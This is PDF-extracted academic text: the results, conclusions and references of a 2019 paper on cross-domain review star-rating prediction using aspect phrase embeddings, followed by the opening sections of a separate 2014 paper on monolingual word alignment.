domain. Experiments are performed using 10-fold cross validation within each of the 12 datasets. Note that lower scores indicate a smaller amount Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 10/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Table 3 MAE results for in-domain review rating prediction. Categories are sorted in descending order by number of reviews, with the most popular review categories at the top of the list. MAE A 3NCF w2v ape pape w2v + ape w2v + pape Books 0.821 0.542 0.664 0.663 0.530 0.521 Restaurants 0.779 0.484 0.598 0.611 0.471 0.466 Attractions 0.644 0.567 0.771 0.803 0.554 0.549 Clothing 0.988 0.544 0.760 0.742 0.529 0.518 Homeware 1.055 0.581 0.760 0.751 0.563 0.543 Hotels 0.746 0.455 0.553 0.579 0.442 0.441 Nightlife 1.061 0.579 0.691 0.715 0.555 0.554 Events 1.127 0.595 0.678 0.709 0.565 0.568 Casinos 1.127 0.769 0.771 0.803 0.689 0.705 Hair salons 1.096 0.410 0.498 0.521 0.405 0.414 Resorts 1.208 0.793 0.760 0.777 0.689 0.692 Dentists 1.767 0.322 0.404 0.399 0.317 0.324 of error and hence better performance. These results show that both APE and PAPE combined with word embeddings (w2v+APE and w2v+PAPE) consistently outperform the sole use of word embeddings (w2v). We also observe that the sole use of phrase embeddings (APE and PAPE) does not suffice to outperform word embeddings, whereas their combination with w2v leads to clear improvements in all cases. This proves the importance of phrases, however we also see that using the rest of the text in the review is useful to boost performance. Likewise, both of our combining methods clearly outperform the baseline method (A3NCF) by Cheng et al. (2018), with the exception of attractions when the performance is measured using RMSE, which is the only case where the baseline performs better; the combining methods leveraging phrase embeddings are clearly better for the rest of the domains. This emphasises the importance of using word embeddings for capturing semantics of aspect phrases, even when the experiments are within the same domain. A comparison between our two proposed methods using phrase embeddings shows that polarised phrase embeddings outperform phrase embeddings for the most popular review categories, whereas the difference is not so clear for less popular categories. All in all, these results show that the use of either form of phrase embeddings combined with word embeddings leads to improvements in the review rating prediction when the training and test data belong to the same domain. The main goal of our work is however to show their effectiveness on cross-domain review rating prediction, which we discuss in the next section. The in-domain results presented in this section enable us to perform a comparison with the cross-domain results presented next. Cross-domain review rating prediction Tables 5 and 6 show results for cross-domain review rating prediction. While experiments are also performed using 10-fold cross-validation, we train the classifier for a particular domain using data from the other 11 datasets, i.e., simulating the scenario where we do not have any labelled data for the target domain. We also include results for the best Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Table 4 RMSE results for in-domain review rating prediction. Categories are sorted in descending or- der by number of reviews, with the most popular review categories at the top of the list. RMSE A 3NCF w2v ape pape w2v + ape w2v + pape Books 1.068 1.057 1.223 1.225 1.038 1.023 Restaurants 0.976 0.856 1.007 1.031 0.836 0.828 Attractions 0.823 0.996 1.132 1.126 0.975 0.968 Clothing 1.211 1.043 1.343 1.320 1.021 1.001 Homeware 1.281 1.144 1.381 1.370 1.115 1.081 Hotels 0.926 0.809 0.942 0.990 0.786 0.784 Nightlife 1.251 1.001 1.139 1.172 0.961 0.958 Events 1.306 1.054 1.153 1.196 1.004 1.006 Casinos 1.304 1.245 1.218 1.252 1.118 1.128 Hair salons 1.271 1.019 1.150 1.168 0.993 0.997 Resorts 1.395 1.295 1.224 1.238 1.143 1.136 Dentists 1.891 1.016 1.157 1.121 0.994 0.983 Table 5 MAE results for cross-domain review rating prediction. BID, best in-domain. Categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. MAE A 3NCF BID w2v ape pape w2v + ape w2v + pape books 0.913 0.521 0.725 0.858 0.826 0.691 0.672 restaurants 0.866 0.466 0.514 0.624 0.657 0.502 0.501 attractions 0.736 0.549 0.613 0.702 0.757 0.608 0.596 clothing 0.995 0.518 0.712 0.886 0.834 0.684 0.656 homeware 1.061 0.543 0.821 0.993 0.964 0.801 0.776 hotels 0.826 0.441 0.494 0.588 0.654 0.483 0.490 nightlife 1.111 0.554 0.541 0.695 0.723 0.530 0.524 events 1.155 0.565 0.543 0.682 0.729 0.525 0.521 casinos 1.151 0.689 0.652 0.799 0.851 0.630 0.623 hair salons 1.169 0.405 0.353 0.494 0.569 0.337 0.341 resorts 1.106 0.689 0.633 0.762 0.819 0.606 0.602 dentists 1.258 0.317 0.272 0.451 0.543 0.266 0.268 performance for each review category when we train with data from the same domain, which is represented as BID (best in-domain). This enables us to compare whether and the extent to which the use of out-of-domain data for training can help to improve the performance for each review category. Results show a remarkable difference between popular and non-popular review categories. For the 6 most popular review categories (books, restaurants, attractions, clothing, homeware, hotels), the best performance is obtained by the best in-domain (BID) classifier, which indicates that for review categories with large amounts of training data, it is better to use in-domain data. However, when we look at the bottom 6 review categories (nightlife, events, casinos, hair salons, resorts, dentists), we observe that the cross-domain Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 12/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Table 6 RMSE results for cross-domain review rating prediction. BID, best in-domain. Categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. RMSE A 3NCF BID w2v ape pape w2v + ape w2v + pape books 1.130 1.023 1.354 1.481 1.440 1.307 1.278 restaurants 1.121 0.828 0.891 1.045 1.094 0.870 0.868 attractions 0.902 0.823 1.062 1.155 1.275 1.050 1.034 clothing 1.237 1.001 1.265 1.453 1.418 1.229 1.190 homeware 1.330 1.081 1.443 1.600 1.579 1.417 1.386 hotels 1.073 0.784 0.854 0.980 1.077 0.836 0.844 nightlife 1.359 0.958 0.937 1.133 1.177 0.921 0.912 events 1.402 1.004 0.973 1.148 1.221 0.943 0.936 casinos 1.414 1.118 1.081 1.250 1.322 1.048 1.039 hair salons 1.437 0.993 0.900 1.116 1.246 0.866 0.876 resorts 1.382 1.136 1.064 1.214 1.296 1.024 1.018 dentists 1.513 0.983 0.887 1.181 1.323 0.870 0.873 classifier leveraging out-of-domain data for training achieves higher performance. While the sole use of word embeddings (w2v) leads to improved performance for the least popular categories, the improvement is even better when we incorporate either phrase embeddings or polarised phrase embeddings. The results are also positive for the w2v+PAPE over the w2v+APE; even if the results are not better in 100% of the cases, w2v+PAPE tends to outperform w2v+APE in most cases, with just a small difference when APE is better, showing that one can rely on PAPE for all cases dealing with non-popular domains. Our combining methods (w2v+APE and w2v+PAPE) also outperform the state-of-the-art baseline A3NCF for all of the non-popular review domains, with some variation for the popular review domains. This again reinforces the potential of our methods combining phrase embeddings for cross-domain review rating prediction applied to review domains with little training data available. These experiments show a clear shift in the performance of in-domain classifiers when the amount of training data decreases, encouraging the use of out-of-domain data for training in those cases. Likewise, this motivates the use of the cross-domain classifier for new domains where no labelled data is available for training, for instance because reviews are collected from a website where no ratings are given by the user, such as Facebook, Twitter or comments on blogs. Further to this, Fig. 2 shows the relative improvements of our w2v+PAPE cross-domain classifier over the A3NCF and the BID classifiers, both for the MAE and RMSE metrics. Review domains are sorted by popularity on the x axis, with the least popular domains on the right. The relative improvement on each review domain is represented by the blue line. The line of best fit (in black) shows the overall tendency of our cross-domain classifier to achieve an increasing relative improvement over other methods as the popularity of the review domain and subsequently the amount of in-domain training data increases. This Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 0 .2 0 .3 0 .4 0 .5 0 .6 0 .7 0 .8 a) MAE improvement over A3NCF − 0 .4 − 0 .2 0 .0 0 .1 b) MAE improvement over best in−domain − 0 .1 0 .0 0 .1 0 .2 0 .3 0 .4 c) RMSE improvement over A3NCF − 0 .2 − 0 .1 0 .0 0 .1 d) RMSE improvement over best in−domain Figure 2 Relative improvement of the w2v+PAPE cross-domain classifier over the A3NCF and best in-domain (BID) classifiers. Review domains are sorted by popularity on the x axis, with the least pop- ular domains on the right. The relative improvement on each review domain is represented by the blue line. The line of best fit (in black) shows the overall tendency of our cross-domain classifier to achieve an increasing relative improvement over other methods as the popularity of the review domain and subse- quently the amount of in-domain training data increases. Full-size DOI: 10.7717/peerjcs.225/fig-2 reinforces our cross-domain classifier as a suitable alternative to achieve the best results on the least popular domains, outperforming any other in-domain alternative. Effect of the size of the training data Since cross-domain experiments benefit from larger training sets, we assess the effect of the size of the training data on the performance of the rating prediction system. We evaluate the performance of cross-domain rating prediction by using different percentages of the training data available, ranging from 1% to 100%, which we then compare with the best Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.225/fig-2 http://dx.doi.org/10.7717/peerj-cs.225 Table 7 MAE Results for cross-domain review rating prediction with different percentages of the training data. BID, best in-domain. Categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. MAE 1 2 5 10 25 50 75 100 books 0.706 0.682 0.666 0.661 0.663 0.667 0.671 0.672 BID=0.521 restaurants 0.571 0.539 0.518 0.505 0.501 0.501 0.501 0.501 BID=0.466 attractions 0.615 0.604 0.596 0.594 0.593 0.595 0.596 0.596 BID=0.549 clothing 0.718 0.699 0.682 0.671 0.66 0.657 0.656 0.656 BID=0.518 homeware 0.869 0.848 0.818 0.800 0.787 0.779 0.777 0.776 BID=0.543 hotels 0.531 0.518 0.503 0.496 0.493 0.491 0.491 0.490 BID=0.441 nightlife 0.604 0.579 0.553 0.540 0.530 0.526 0.525 0.524 BID=0.554 events 0.601 0.575 0.550 0.537 0.527 0.523 0.522 0.521 BID=0.565 casinos 0.713 0.687 0.657 0.641 0.629 0.625 0.624 0.623 BID=0.689 hair salons 0.413 0.388 0.367 0.358 0.348 0.344 0.342 0.341 BID=0.405 resorts 0.685 0.658 0.632 0.619 0.606 0.604 0.603 0.602 BID=0.689 dentists 0.361 0.332 0.305 0.292 0.278 0.272 0.270 0.268 BID=0.317 in-domain rating prediction system. The subset of the training data is randomly sampled until the percentage is satisfied. Tables 7 and 8 show the results of using different percentages of the training data for the rating prediction based on MAE and RMSE respectively. Results for each review category is compared with the best in-domain (BID) result, and the best results are highlighted in bold, i.e., either the best in-domain when this is the best, or the specific percentages when the cross-domain prediction system performs best. As we observed before, the in-domain prediction system performs better for the top 6 review categories based on popularity, thanks to the availability of more training data. We are particularly interested in seeing how much data we need with the less popular categories for the cross-domain rating prediction systems to perform better than their in-domain counterparts. Looking at the 6 least popular review categories, we observe that using only 5% of the training data suffices in all cases to outperform the best in-domain system, with the percentage dropping up to 2% for casinos and hair salons and up to 1% for resorts. Note that out of the (up to) 58 million reviews available for cross-domain training, a subset Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 15/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Table 8 RMSE Results for cross-domain review rating prediction with different percentages of the training data. BID, best in-domain. Categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. RMSE 1 2 5 10 25 50 75 100 books 1.311 1.281 1.262 1.258 1.264 1.270 1.276 1.278 BID=1.023 restaurants 0.976 0.925 0.895 0.876 0.869 0.869 0.869 0.868 BID=0.828 attractions 1.056 1.040 1.029 1.027 1.028 1.032 1.033 1.034 BID=0.823 clothing 1.259 1.236 1.217 1.206 1.194 1.191 1.190 1.190 BID=1.001 homeware 1.484 1.467 1.435 1.415 1.400 1.389 1.387 1.386 BID=1.081 hotels 0.907 0.889 0.865 0.854 0.848 0.845 0.844 0.844 BID=0.784 nightlife 1.022 0.987 0.951 0.933 0.919 0.914 0.913 0.912 BID=0.958 events 1.048 1.013 0.977 0.959 0.945 0.939 0.937 0.936 BID=1.004 casinos 1.146 1.115 1.078 1.058 1.045 1.040 1.039 1.039 BID=1.118 hair salons 1.015 0.969 0.929 0.910 0.890 0.882 0.878 0.876 BID=0.993 resorts 1.119 1.085 1.054 1.038 1.024 1.019 1.018 1.018 BID=1.136 dentists 1.058 1.004 0.953 0.925 0.896 0.884 0.878 0.873 BID=0.983 of 5% only represents (up to) 2.9 million reviews, which are easy to obtain through online review platforms. We also observe that, while performance keeps improving as we increase the size of the training data, it generally shows a tendency to plateau after 25% of the reviews are used for training. This reflects that after about 14.5 million reviews the system has enough training data and can hardly improve its performance. CONCLUSIONS In this work we have proposed a novel method that leverages aspect phrase embeddings for predicting the star rating of online reviews, which is applicable in in-domain and cross-domain settings. We have also shown that our cross-domain approach is effective for making predictions in review domains with a paucity of training data, where training data from other domains can be successfully exploited. Previous work on review rating prediction had been limited to popular reviews domains, such as restaurants or hotels. Our study broadens the findings of previous works by experimenting on 12 different datasets Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 16/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 pertaining to 12 different review domains of very different levels of popularity, and collects from different sources including Yelp, Amazon and TripAdvisor. Given that some of these review domains have very limited availability of labelled data for training, our aim has been to propose a cross-domain review rating prediction system that would perform well for those non-popular domains. Likewise, a cross-domain review rating prediction system can be used to predict ratings of reviews gathered from platforms where users do not assign ratings, such as Facebook or Twitter. Our review rating prediction system leverages both POS taggers and sentiment lexicons to extract aspect phrases from reviews, i.e., phrases referring to different features of a business. To enable generalisation of aspect phrases to different domains, we make use of universal representations using word embeddings; we propose two different models for feature representations, (1) Aspect Phrase Embeddings (APE), which aggregates all aspect phrases of a review, and (2) Polarised Aspect Phrase Embeddings (PAPE), which considers positive and negative aspect phrases separately to create an embedding representation for each. We compare our results with those of the best-performing classifier by Cheng et al. (2018) and another baseline that uses word embedding representations of the entire review. We developed both in-domain and cross-domain review rating prediction systems following this methodology; this allows us to compare performance on in-domain and cross-domain experiments for different review domains. Our experiments show that both of our methods leveraging phrase embeddings lead to improvements over the rest of the baseline methods, both in the in-domain and the cross-domain settings. Interestingly, a comparison of results for these two experiment settings shows that performance scores are higher for the in-domain classifier when we make predictions on the most popular domains, however the cross-domain classifier leads to substantial improvements for the least popular domains. Our results indicate that a classifier trained from in-domain data is more suitable for popular review domains, whereas unpopular review domains can be improved when out-of-domain data is used for training along with our aspect phrase embedding representation. Further looking into the amount of data needed for training a cross-domain rating prediction system, we observe that a small sample of about 5% of the data available (i.e., fewer than 3 million reviews) for the other domains is enough to outperform baseline methods. Our work defines the state-of-the-art and the first approach to cross-domain review rating prediction, expanding the hitherto limited research focusing on in-domain settings for popular domains. Research in cross-domain review rating prediction is still in its infancy, and we hope that our work will encourage further research in the task. Future work on cross-domain review rating prediction could further focus on the detection of implicit aspect phrases for improving performance, as well as in capturing cultural differences in writing reviews, given that users from different countries may express themselves differently when writing positive or negative reviews. To further test additional methods to cross-domain rating prediction, our plans for future work include testing methods for transfer learning and domain adaptation. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 17/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Arkaitz Zubiaga is an Academic Editor for PeerJ. Author Contributions • Aiqi Jiang and Arkaitz Zubiaga conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: This Github repository is related to the code: https://github.com/SleepingAggie/star- rating-prediction. REFERENCES Bird S, Loper E. 2004. NLTK: the natural language toolkit. In: Proceedings of the ACL 2004 interactive poster and demonstration sessions. Stroudsburg: Association for Computational Linguistics, 31. Catherine R, Cohen W. 2017. Transnets: learning to transform for recommendation. In: Proceedings of the eleventh ACM conference on recommender systems. New York: ACM, 288–296. Cheng Z, Ding Y, He X, Zhu L, Song X, Kankanhalli MS. 2018. A3NCF: an adaptive aspect attention model for rating prediction. In: International Joint Conferences on Artificial Intelligence. Stockholm: IJCAI, 3748–3754. Fan M, Khademi M. 2014. Predicting a business star in Yelp from its reviews text alone. ArXiv preprint. arXiv:1401.0864. Ganu G, Elhadad N, Marian A. 2009. Beyond the stars: improving rating predictions using review text content. In: 12th International Workshop on the Web and Databases, vol. 9. Rhode Island: WebDB, 1–6. Available at http://people.dbmi.columbia.edu/ noemie/papers/webdb09.pdf . Goss J. 2017. A melting pot of cuisines: examining the relationship between restaurant ethnicities and food safety inspection scores. PhD thesis, Georgetown University. He R, McAuley J. 2016. Ups and downs: modeling the visual evolution of fashion trends with one-class collaborative filtering. In: Proceedings of the international conference on World Wide Web. Geneva: International World Wide Web Conferences Steering Committee, 507–517. Available at https://cseweb.ucsd.edu/~jmcauley/pdfs/www16a. pdf . Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 18/21 https://peerj.com https://github.com/SleepingAggie/star-rating-prediction https://github.com/SleepingAggie/star-rating-prediction http://arXiv.org/abs/1401.0864 http://people.dbmi.columbia.edu/noemie/papers/webdb09.pdf http://people.dbmi.columbia.edu/noemie/papers/webdb09.pdf https://cseweb.ucsd.edu/~jmcauley/pdfs/www16a.pdf https://cseweb.ucsd.edu/~jmcauley/pdfs/www16a.pdf http://dx.doi.org/10.7717/peerj-cs.225 Hu M, Liu B. 2004. Mining and summarizing customer reviews. In: Proceedings of the ACM SIGKDD international conference on knowledge discovery and data mining. ACM, 168–177. Huang J, Rogers S, Joo E. 2014. Improving restaurants by extracting subtopics from yelp reviews. iConference 2014 (Social Media Expo). Jin Z, Li Q, Zeng DD, Zhan Y, Liu R, Wang L, Ma H. 2016. Jointly modeling review content and aspect ratings for review rating prediction. In: Proceedings of the 39th international ACM SIGIR conference on research and development in information retrieval. New York: ACM, 893–896. Kaplan AM, Haenlein M. 2010. Users of the world, unite! The challenges and opportuni- ties of Social Media. Business Horizons 53(1):59–68 DOI 10.1016/j.bushor.2009.09.003. Laddha A, Mukherjee A. 2018. Aspect opinion expression and rating predic- tion via LDA—CRF hybrid. Natural Language Engineering 24(4):611–639 DOI 10.1017/S135132491800013X. Lei X, Qian X, Zhao G. 2016. Rating prediction based on social sentiment from textual reviews. IEEE Transactions on Multimedia 18(9):1910–1921 DOI 10.1109/TMM.2016.2575738. Leung CW, Chan SC, Chung F-L. 2006. Integrating collaborative filtering and sentiment analysis: a rating inference approach. In: Proceedings of the ECAI 2006 workshop on recommender systems. 62–66. Li F, Liu N, Jin H, Zhao K, Yang Q, Zhu X. 2011. Incorporating reviewer and product information for review rating prediction. In: Proceedings of the international joint conference on artificial intelligence, vol. 11. 1820–1825. Liu B, Zhang L. 2012. A survey of opinion mining and sentiment analysis. In: Mining text data. New York: Springer, 415–463. McAuley J, Targett C, Shi Q, Van Den Hengel A. 2015. Image-based recommendations on styles and substitutes. In: Proceedings of the international ACM SIGIR conference on research and development in information retrieval. New York: ACM, 43–52. Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. 2013. Distributed represen- tations of words and phrases and their compositionality. In: Advances in neural information processing systems. Nevada: NIPS, 3111–3119. Available at https://papers. nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their- compositionality.pdf . Mousavizadeh M, Koohikamali M, Salehan M. 2015. The effect of central and peripheral cues on online review helpfulness: a comparison between functional and expressive products. In: Proceedings of the international conference on information systems. Ning X, Yac L, Wang X, Benatallah B, Dong M, Zhang S. 2018. Rating prediction via generative convolutional neural networks based regression. Pattern Recognition Letters In Press. Pang B, Lee L. 2005. Seeing stars: exploiting class relationships for sentiment categoriza- tion with respect to rating scales. In: Proceedings of the 43rd annual meeting of the association for computational linguistics. Stroudsburg: Association for Computational Linguistics, 115–124. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 19/21 https://peerj.com http://dx.doi.org/10.1016/j.bushor.2009.09.003 http://dx.doi.org/10.1017/S135132491800013X http://dx.doi.org/10.1109/TMM.2016.2575738 https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf http://dx.doi.org/10.7717/peerj-cs.225 Pang B, Lee L, Vaithyanathan S. 2002. Thumbs up?: sentiment classification using machine learning techniques. In: Proceedings of the conference on empirical methods in natural language processing. Stroudsburg: Association for Computational Linguistics, 79–86. Perrin A. 2017. Social media usage: 2005–2015. Technical report. Pew Research Center. Poria S, Cambria E, Hazarika D, Majumder N, Zadeh A, Morency L-P. 2017. Context- dependent sentiment analysis in user-generated videos. In: Proceedings of the 55th annual meeting of the association for computational linguistics (volume 1: long papers). 873–883. Qu L, Ifrim G, Weikum G. 2010. The bag-of-opinions method for review rating predic- tion from sparse text patterns. In: Proceedings of the 23rd international conference on computational linguistics. Association for Computational Linguistics, 913–921. Quan-Haase A, Young AL. 2010. Uses and gratifications of social media: a comparison of Facebook and instant messaging. Bulletin of Science, Technology & Society 30(5):350–361 DOI 10.1177/0270467610380009. Salehan M, Kim DJ. 2016. Predicting the performance of online consumer reviews: a sentiment mining approach to big data analytics. Decision Support Systems 81:30–40 DOI 10.1016/j.dss.2015.10.006. Salehan M, Zhang S, Aghakhani N. 2017. A recommender system for restaurant reviews based on consumer segment. In: Proceedings of the Americas conference on information systems. Seo S, Huang J, Yang H, Liu Y. 2017a. Interpretable convolutional neural networks with dual local and global attention for review rating prediction. In: Proceedings of the eleventh ACM conference on recommender systems. New York: ACM, 297–305. Seo S, Huang J, Yang H, Liu Y. 2017b. Representation learning of users and items for review rating prediction using attention-based convolutional neural network. In: 3rd international workshop on machine learning methods for recommender systems (MLRec)(SDM17). Sparks BA, Browning V. 2011. The impact of online reviews on hotel booking intentions and perception of trust. Tourism Management 32(6):1310–1323 DOI 10.1016/j.tourman.2010.12.011. Taboada M, Brooke J, Tofiloski M, Voll K, Stede M. 2011. Lexicon-based methods for sentiment analysis. Computational Linguistics 37(2):267–307 DOI 10.1162/COLI_a_00049. Tang D, Qin B, Liu T, Yang Y. 2015. User modeling with neural network for review rating prediction. In: Proceedings of IJCAI. 1340–1346. Titov I, McDonald R. 2008. Modeling online reviews with multi-grain topic models. In: Proceedings of the 17th international conference on World Wide Web. New York: ACM, 111–120. Tripathy A, Agrawal A, Rath SK. 2016. Classification of sentiment reviews using n- gram machine learning approach. Expert Systems with Applications 57:117–126 DOI 10.1016/j.eswa.2016.03.028. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 20/21 https://peerj.com http://dx.doi.org/10.1177/0270467610380009 http://dx.doi.org/10.1016/j.dss.2015.10.006 http://dx.doi.org/10.1016/j.tourman.2010.12.011 http://dx.doi.org/10.1162/COLI_a_00049 http://dx.doi.org/10.1016/j.eswa.2016.03.028 http://dx.doi.org/10.7717/peerj-cs.225 Vargas FA, Pardo TAS. 2018. Aspect clustering methods for sentiment analysis. In: International conference on computational processing of the Portuguese language. New York: Springer, 365–374. Wang B, Chen B, Ma L, Zhou G. 2019. User-personalized review rating prediction method based on review text content and user-item rating matrix. Information 10(1):1. Wang Y, Huang M, Zhao L, Zhu X. 2016. Attention-based LSTM for aspect-level sentiment classification. In: Proceedings of the conference on empirical methods in natural language processing. 606–615. Wang H, Lu Y, Zhai C. 2010. Latent aspect rating analysis on review text data: a rating regression approach. In: Proceedings of the ACM SIGKDD international conference on knowledge discovery and data mining. New York: ACM, 783–792. Wang B, Xiong S, Huang Y, Li X. 2018. Review rating prediction based on user context and product context. Applied Sciences 8(10):1849 DOI 10.3390/app8101849. Xing S, Liu F, Wang Q, Zhao X, Li T. 2019. A hierarchical attention model for rating prediction by leveraging user and product reviews. Neurocomputing 332:417–427 DOI 10.1016/j.neucom.2018.12.027. Ye Q, Zhang Z, Law R. 2009. Sentiment classification of online reviews to travel destina- tions by supervised machine learning approaches. Expert Systems with Applications 36(3):6527–6535 DOI 10.1016/j.eswa.2008.07.035. Zhang Q, Qu Y. 2013. Topic-opposite sentiment mining model for online review analysis. Journal of Frontiers of Computer Science and Technology 7(7):620–629. Zhang S, Salehan M, Leung A, Cabral I, Aghakhani N. 2018. A recommender system for cultural restaurants based on review factors and review sentiment. In: Proceedings of the Americas conference on information systems. Zhang L, Wang S, Liu B. 2018. Deep learning for sentiment analysis: a survey. Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery 8(4):e1253. Zhao G, Qian X, Xie X. 2016. User-service rating prediction by exploring social users’ rating behaviors. IEEE Transactions on Multimedia 18(3):496–506 DOI 10.1109/TMM.2016.2515362. Zhou X, Wan X, Xiao J. 2015. Representation learning for aspect category detection in online reviews. In: Proceedings of the AAAI conference on artificial intelligence. 417–424. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 21/21 https://peerj.com http://dx.doi.org/10.3390/app8101849 http://dx.doi.org/10.1016/j.neucom.2018.12.027 http://dx.doi.org/10.1016/j.eswa.2008.07.035 http://dx.doi.org/10.1109/TMM.2016.2515362 http://dx.doi.org/10.7717/peerj-cs.225 work_k6wfvskhsjdfzbbrhtoyfkwd7a ---- Back to Basics for Monolingual Alignment: Exploiting Word Similarity and Contextual Evidence Back to Basics for Monolingual Alignment: Exploiting Word Similarity and Contextual Evidence Md Arafat Sultan†, Steven Bethard‡ and Tamara Sumner† †Institute of Cognitive Science and Department of Computer Science University of Colorado Boulder ‡Department of Computer and Information Sciences University of Alabama at Birmingham arafat.sultan@colorado.edu, bethard@cis.uab.edu, sumner@colorado.edu Abstract We present a simple, easy-to-replicate monolin- gual aligner that demonstrates state-of-the-art performance while relying on almost no su- pervision and a very small number of external resources. Based on the hypothesis that words with similar meanings represent potential pairs for alignment if located in similar contexts, we propose a system that operates by finding such pairs. In two intrinsic evaluations on alignment test data, our system achieves F1 scores of 88– 92%, demonstrating 1–3% absolute improve- ment over the previous best system. Moreover, in two extrinsic evaluations our aligner out- performs existing aligners, and even a naive application of the aligner approaches state-of- the-art performance in each extrinsic task. 1 Introduction Monolingual alignment is the task of discovering and aligning similar semantic units in a pair of sentences expressed in a natural language. Such alignments pro- vide valuable information regarding how and to what extent the two sentences are related. Consequently, alignment is a central component of a number of important tasks involving text comparison: textual entailment recognition, textual similarity identifica- tion, paraphrase detection, question answering and text summarization, to name a few. The high utility of monolingual alignment has spawned significant research on the topic in the re- cent past. Major efforts that have treated alignment as a standalone problem (MacCartney et al., 2008; Thadani and McKeown, 2011; Yao et al., 2013a) are primarily supervised, thanks to the manually aligned corpus with training and test sets from Microsoft Re- search (Brockett, 2007). Primary concerns of such work include both quality and speed, due to the fact that alignment is frequently a component of larger NLP tasks. Driven by similar motivations, we seek to devise a lightweight, easy-to-construct aligner that produces high-quality output and is applicable to various end tasks. Amid a variety of problem formulations and ingenious approaches to alignment, we take a step back and examine closely the effectiveness of two frequently made assumptions: 1) Related semantic units in two sentences must be similar or related in their meaning, and 2) Commonalities in their se- mantic contexts in the respective sentences provide additional evidence of their relatedness (MacCartney et al., 2008; Thadani and McKeown, 2011; Yao et al., 2013a; Yao et al., 2013b). Alignment, based solely on these two assumptions, reduces to finding the best combination of pairs of similar semantic units in sim- ilar contexts. Exploiting existing resources to identify similarity of semantic units, we search for robust techniques to identify contextual commonalities. Dependency trees are a commonly used structure for this purpose. While they remain a central part of our aligner, we expand the horizons of dependency-based alignment beyond exact matching by systematically exploiting the notion of “type equivalence” with a small hand- crafted set of equivalent dependency types. In addi- tion, we augment dependency-based alignment with surface-level text analysis. While phrasal alignments are important and have 219 Transactions of the Association for Computational Linguistics, 2 (2014) 219–230. Action Editor: Alexander Koller. Submitted 11/2013; Revised 1/2014; Published 5/2014. c©2014 Association for Computational Linguistics. been investigated in multiple studies, we focus pri- marily on word alignments (which have been shown to form the vast majority of alignments (≥ 95%) in multiple human-annotated corpora (Yao et al., 2013b)), keeping the framework flexible enough to allow incorporation of phrasal alignments in future. Evaluation of our aligner on the benchmark dataset reported in (Brockett, 2007) shows an F1 score of 91.7%: a 3.1% absolute improvement over the previ- ous best system (Yao et al., 2013a), corresponding to a 27.2% error reduction. It shows superior perfor- mance also on the dataset reported in (Thadani et al., 2012). Additionally, we present results of two extrinsic evaluations, namely textual similarity iden- tification and paraphrase detection. Our aligner not only outperforms existing aligners in each task, but also approaches top systems for the extrinsic tasks. 2 Background Monolingual alignment has been applied to various NLP tasks including textual entailment recognition (Hickl et al., 2006; Hickl and Bensley, 2007), para- phrase identification (Das and Smith, 2009; Madnani et al., 2012), and textual similarity assessment (Bär et al., 2012; Han et al., 2013) – in some cases ex- plicitly, i.e., as a separate module. But many such systems resort to simplistic and/or ad-hoc strategies for alignment and in most such work, the alignment modules were not separately evaluated on alignment benchmarks, making their direct assessment difficult. With the introduction of the MSR alignment cor- pus (Brockett, 2007) developed from the second Recognizing Textual Entailment challenge data (Bar- Haim et al., 2006), direct evaluation and comparison of aligners became possible. The first aligner trained and evaluated on the corpus was a phrasal aligner called MANLI (MacCartney et al., 2008). It repre- sents alignments as sets of different edit operations (where a sequence of edits turns one input sentence into the other) and finds an optimal set of edits via a simulated annealing search. Weights of different edit features are learned from the training set of the MSR alignment corpus using a perceptron learning algorithm. MANLI incorporates only shallow fea- tures characterizing contextual similarity: relative positions of the two phrases being aligned (or not) in the two sentences and boolean features representing whether or not the preceding and following tokens of the two phrases are similar. Thadani and McKeown (2011) substituted MANLI’s simulated annealing-based decoding with integer linear programming, and achieved a consider- able speed-up. More importantly for our discussion, they found contextual evidence in the form of syn- tactic constraints useful in better aligning stop words. Thadani et al. (2012) further extended the model by adding features characterizing dependency arc edits, effectively bringing stronger influence of contextual similarity into alignment decisions. Again the perfor- mance improved consequently. The most successful aligner to date both in terms of accuracy and speed, called JacanaAlign, was de- veloped by Yao et al. (2013a). In contrast to the earlier systems, JacanaAlign is a word aligner that formulates alignment as a sequence labeling prob- lem. Each word in the source sentence is labeled with the corresponding target word index if an align- ment is found. It employs a conditional random field to assign the labels and uses a feature set similar to 